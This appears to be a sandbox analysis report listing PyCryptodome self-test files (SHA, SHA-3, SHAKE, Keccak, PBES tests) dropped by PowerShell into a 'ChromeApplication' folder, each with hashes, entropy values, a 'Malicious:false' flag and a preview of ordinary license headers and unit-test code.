                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA256.py: Self-test for the SHA-256 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA384.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2775
                                                                                                                                                                                                  Entropy (8bit):5.608484169393894
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NzwEIB0jcQHMsvI/S3oCFlPyLT0L3QlmQe5FKk8MHn/TxJcwkgspaZa:NwfFQHvoA4iwTe5FF8kn/lJ9LKB
                                                                                                                                                                                                  MD5:C28E0828194EB028F7B306FB712A9EAA
                                                                                                                                                                                                  SHA1:EA67E9AF1A6F3F740A3FF214B329434102F8DFB5
                                                                                                                                                                                                  SHA-256:6C12D0636052AC571F310AECFE96011410C6CDFAB71EB8FCA5264997F3D03F49
                                                                                                                                                                                                  SHA-512:EE94D62A499A49689943A39EE62C71E6E4FEE350CC3DCA542BF98BF1379EB40B59B97654EC4475A88B40A495A9CCA13DD7B6F2FB1B64AFCD8E0CACF3498493D3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA.py: Self-test for the SHA-384 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA3_224.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2909
                                                                                                                                                                                                  Entropy (8bit):5.083516920318784
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:sZIB0jcQHMsvI/S3oCFldtjT+Y+J+K+QyPqOKCV4y9KVbghRMb0krGraZy:saFQHvooBjs1HyCU0bgUb0QGrh
                                                                                                                                                                                                  MD5:3A2B4546DFD29BD8244B93436FB7C3D2
                                                                                                                                                                                                  SHA1:5050E387FD02C3B1184B8A6C0681624BB54D535C
                                                                                                                                                                                                  SHA-256:C50486C345952D8FD5BE518F43C618DB8D586F374CFDC382C005A38006B4EF29
                                                                                                                                                                                                  SHA-512:012F1E12125D92B22661BDD1715A05DF84822207534CCE8DAD1F1D2EBD8D89566D05A1E3B87E08A7F510E4B9C6C9C070AD8B8EEA7C4AFC362405A0769ECD8793
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA3_224.py: Self-test for the SHA-3/224 hash function..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA3_256.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2911
                                                                                                                                                                                                  Entropy (8bit):5.091560650200558
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:spIB0jcQHMsvI/S3oCFlstjT+Y+J+f+QyPqOKCV4y9KVbgCiMbxkY9raZy:sqFQHvotBjscHyCU0bgChbxtrh
                                                                                                                                                                                                  MD5:EA8C7A86602639218A01895640882344
                                                                                                                                                                                                  SHA1:4AFDA1348AE7171EE91211FD68FFFC40B1DDD52B
                                                                                                                                                                                                  SHA-256:872C11A1795C3CF07AAACA69A85F622D045E317D7401EFD9194A762DCE149E31
                                                                                                                                                                                                  SHA-512:AD0C35C1A9305A768C76CEF52D97E845E56B12A89F66A3AEC43F192475A1EC7DFA08CCE2713825BA920FF046DE65D0C83BAB65464262C0672D1AC0ECA5A539FA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA3_256.py: Self-test for the SHA-3/256 hash function..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA3_384.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2909
                                                                                                                                                                                                  Entropy (8bit):5.083684469312827
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:sJIB0jcQHMsvI/S3oCFlstjT+Y+J+b+QyPqOKCV4y9KVbg60Mb0kvraZy:sKFQHvotBjsMHyCU0bg67b0Grh
                                                                                                                                                                                                  MD5:6996CA60721AF6613146FDD87B1AAFE2
                                                                                                                                                                                                  SHA1:2F21AAF3C476733885C5CFC827CE9AD5D28EAE41
                                                                                                                                                                                                  SHA-256:FCA402667AE407801EC05E7EE90BFCB43253CE564A9F2748C6C2BB839DC4388F
                                                                                                                                                                                                  SHA-512:D91F577B2AA0CC9755400228A113EB76B403D546924230FB4BE35F4F42441DA71C67EDFC66D1FA7A47F5A6032538E7664AC7446516B90D89266608C15B559488
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA3_384.py: Self-test for the SHA-3/384 hash function..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA3_512.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2910
                                                                                                                                                                                                  Entropy (8bit):5.089282138992312
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:sdIB0jcQHMsvI/S3oCFlhtjT+Y+J+++QyPqOKCV4y9KVbgfMb0k6raZy:suFQHvooBjsxHyCU0bg0b05rh
                                                                                                                                                                                                  MD5:777E76440360EA5E1A4F7946D1DC8A73
                                                                                                                                                                                                  SHA1:7A59611CC81F5FE530241C2A58A29EFCDA38B319
                                                                                                                                                                                                  SHA-256:C0D24363A1EE4144A234FB31AB7FEBDF1D99BD16E5859DD90D79D8E1ACF045DD
                                                                                                                                                                                                  SHA-512:50DD4782B63C869D4812EC247DE1F791B0F81AA041D2059EA695B2E0C27597A3803D25017317F79E84DD6F249E81B082D9BA81049D2DA1DE04440E26B5C1CA66
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA3_512.py: Self-test for the SHA-3/512 hash function..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA512.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5338
                                                                                                                                                                                                  Entropy (8bit):5.14528410560435
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:CwfFQHvowBI4SH4XGXPfre5E8xeI0qs8ZSwm3ha8ZSB3CS8ZS934rB:CwdQHvAQG/frkxefqVExLUSjgIrB
                                                                                                                                                                                                  MD5:1C79BE11857F948FBB655DC8AA8153D1
                                                                                                                                                                                                  SHA1:15426D7DB44AE38FF61DB9F1F4FB5E3C2B6E126C
                                                                                                                                                                                                  SHA-256:66CC1C34EBBB0775A0EE58206FD09D9CAFE4AC46114112340C0A8DEF95E24E06
                                                                                                                                                                                                  SHA-512:6FF0560839317907DFCD875F77F695C9F6CBD92BC57348FAF1CB46C4CC8A5672096F3F8036E9EA0F533AF1E7B83C05BF1577E0228320E0667B7F85E97C012C77
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA512.py: Self-test for the SHA-512 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHAKE.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4858
                                                                                                                                                                                                  Entropy (8bit):5.162690426324188
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:M7DqrYJALrYJHdt3EHGuIM1jPGHaudxxqt5xxqpVGOh:4qrskrs9t3q/I6udbq5bWIOh
                                                                                                                                                                                                  MD5:844F1200ABC50C8AF04699ED8693094A
                                                                                                                                                                                                  SHA1:60DD5DCFCBC4028DF905E2C18B57DE9AA1A265ED
                                                                                                                                                                                                  SHA-256:B4FAFF54CEC2BD0071EE9DD38A38F446ACDEB81A7216C18F242D0BD8393E21CE
                                                                                                                                                                                                  SHA-512:8157EF05954697F9F1D75269FCFD8445CB82C302ABECAE386194F6071ED780D6F954BF255AB73CE50ECFCF47BDFB112AEBA48947086C86B2619951CC4F3B193D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_TupleHash.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9000
                                                                                                                                                                                                  Entropy (8bit):4.582880901232354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:vPuxbp/u47AstnU5XIZnCxTVxQo/cnCOa:0dKsdUy1mTVV/cnG
                                                                                                                                                                                                  MD5:0CD739D505C4A5D84BB76784073B1557
                                                                                                                                                                                                  SHA1:CE238370C8D61C1951AF229D6912DC398E4B2261
                                                                                                                                                                                                  SHA-256:996817F0C1FF6BE9642C71B0C64FE8B2B783DF516DFC289C950E7212DB2651E5
                                                                                                                                                                                                  SHA-512:B6273F9B9F342DF9D23BCE216963AE2979A0BC6740BB1458CA39D95A8AE330C1E400DC2CB0CBB864B6D2DA3921FC9F4FAA2090B48F4BBBAAF6CD5BB397230F37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..from binascii import unhexlify, hexlify....from Crypto.Util.py3compat import tobytes..from Crypto.SelfTest.st_common import list_test_cases....from Crypto.Hash import TupleHash128, TupleHash256......class TupleHashTest(unittest.TestCase):.... def new(self, *args, **kwargs):.. return self.TupleHash.new(*args, **kwargs).... def test_new_positive(self):.... h = self.new().. for new_func in self.TupleHash.new, h.new:.... for dbits in range(64, 1024 + 1, 8):.. hobj = new_func(digest_bits=dbits).. self.assertEqual(hobj.digest_size * 8, dbits).... for dbytes in range(8, 128 + 1):.. hobj = new_func(digest_bytes=dbytes).. self.assertEqual(hobj.digest_size, dbytes).... hobj = h.new().. self.assertEqual(hobj.digest_size, self.default_bytes).... def test_new_negative(self):.... h = self.new().. for new_func in self.TupleHash.new, h.new:..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_TurboSHAKE.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15477
                                                                                                                                                                                                  Entropy (8bit):4.797172752964677
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ZhR+CSwVR7RRUMglQOMhFs42YomDg1l0xokdgrQff26duEhOROa1s/0fOa:ZhRaDXkeQvO6uEos4
                                                                                                                                                                                                  MD5:7416C9644E4F1208364986E5473EA89E
                                                                                                                                                                                                  SHA1:FE5A66E3FC35342C9BB9904FE6DCD87AC7AEC33F
                                                                                                                                                                                                  SHA-256:1AD796B5A7AC7C12AAAECCD151CDF0AB312B28621FD09A047F974F9367A30B7E
                                                                                                                                                                                                  SHA-512:4C67EF2BF5D2E0E22F4098A632AE2C25D7FC778D92535CA9B16C0E3F80173E151CAEDBEBDFFB97A5D540FDA1D2114497346C3EEB9954BD3886D08D22E58D2A36
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Self-test suite for Crypto.Hash.TurboSHAKE128 and TurboSHAKE256"""....import unittest..from binascii import unhexlify....from Crypto.SelfTest.st_common import list_test_cases....from Crypto.Hash import TurboSHAKE128, TurboSHAKE256..from Crypto.Util.py3compat import bchr......class TurboSHAKETest(unittest.TestCase):.... def test_new_positive(self):.... xof1 = self.TurboSHAKE.new().. xof1.update(b'90').... xof2 = self.TurboSHAKE.new(domain=0x1F).. xof2.update(b'90').... xof3 = self.TurboSHAKE.new(data=b'90').... out1 = xof1.read(128).. out2 = xof2.read(128).. out3 = xof3.read(128).... self.assertEqual(out1, out2).. self.assertEqual(out1, out3).... def test_new_domain(self):.. xof1 = self.TurboSHAKE.new(domain=0x1D).. xof2 = self.TurboSHAKE.new(domain=0x20).. self.assertNotEqual(xof1.read(128), xof2.read(128)).... def test_update(self):.. pieces = [bchr(10) * 200, bchr(20) * 300].

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_cSHAKE.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6970
                                                                                                                                                                                                  Entropy (8bit):5.194425901690965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:M/DqrYJALrYJHdt3EHGuI3jPiHhu0nHU+aS+rFX3F/0a+WuW96lOh:Gqrskrs9t3q/Ieu0nHULbdV0a+9mcOh
                                                                                                                                                                                                  MD5:66C07A7C4501D81AE688CB8D86E1124C
                                                                                                                                                                                                  SHA1:954B46653D497E318F2D997FB6C10048E64A79B6
                                                                                                                                                                                                  SHA-256:ADED756FB81F8601C093433F2A8549D91033C2FDC632F5D0A96E82D65BBCABB3
                                                                                                                                                                                                  SHA-512:9D20AFBDA3E9BE26EB19D23CFD5758D6CFF425C0EBD0F662E0AF3E47A39955943A30161F4A7DC44C6A26B73C04DFA965F00C677E30D80B753052DD9DC01E0740
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,..# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_keccak.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9139
                                                                                                                                                                                                  Entropy (8bit):4.901557899833285
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:4qrskrs9t3q/I6ffRHk7Lo626/b5pfpkM67Oh:Hrskrs9VqNX9k70626T5lpB6g
                                                                                                                                                                                                  MD5:E6120ECD0AC2994275652761FFC133EF
                                                                                                                                                                                                  SHA1:56AED1B699770BF14C7765D38BE1E11AA6AE4910
                                                                                                                                                                                                  SHA-256:F75F0DDB0190F6B0177DFCD321931AC8BCF9B0A6BF0539B413D719A3E104656E
                                                                                                                                                                                                  SHA-512:544E46E5E4546A31925EE99C8D1DE196F94C90C2FA93105059D2BD95C21D1B67E1E25574B093EA148F713213042528BF32B1660F3942E019FE0D52D5CBDEFAAE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\IO\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2041
                                                                                                                                                                                                  Entropy (8bit):5.273948297631314
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RMWOqrYJALrYJHdG43tDs3EsIG13NcuIH60w0raZ+:uDqrYJALrYJHdt3EHGuIaSrN
                                                                                                                                                                                                  MD5:82492759411EAD272738749D44872798
                                                                                                                                                                                                  SHA1:27789E533A2E5B1EDE1C5C958711BF87FDA622F0
                                                                                                                                                                                                  SHA-256:E0FEABC0079FD763084043FC5C8BE120E43D75E0D12770E73CAE0781423B2F20
                                                                                                                                                                                                  SHA-512:D6E11BD164B8AECB79457398EEFF26491043F127B3E450E01A0C2B384A8A375944B0846CE806BAB4833FECBB2A766775E19E944C81FB80EAE3337AC28F2C1F6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/IO/__init__.py: Self-test for input/output module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. I

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\IO\test_PBES.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4467
                                                                                                                                                                                                  Entropy (8bit):5.082094195261321
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:BDqrYJALrYJHdt3EHGuI44S6Rql3mvncp/3qa:Jqrskrs9t3q/I26Rql3mvncpPqa
                                                                                                                                                                                                  MD5:AB24621790843C9EE84CA887E5B9AF88
                                                                                                                                                                                                  SHA1:FC00589544BE26FFD2AC12AC77AF1515C8DA17C9
                                                                                                                                                                                                  SHA-256:CCC8F12FF8CA42C2FF848798C9BAE1AA606F088B197D51E301515DDF0DF1160C
                                                                                                                                                                                                  SHA-512:1923E379D29A04DFC95C004BB408AFFA8483803D542FB981A8D42AEAC7C3EA2F2F479248DDF24F31026F6B005D068BA28EE52EEA2498BCF06F31311463E80737
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/IO/test_PBES.py: Self-test for the _PBES module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN

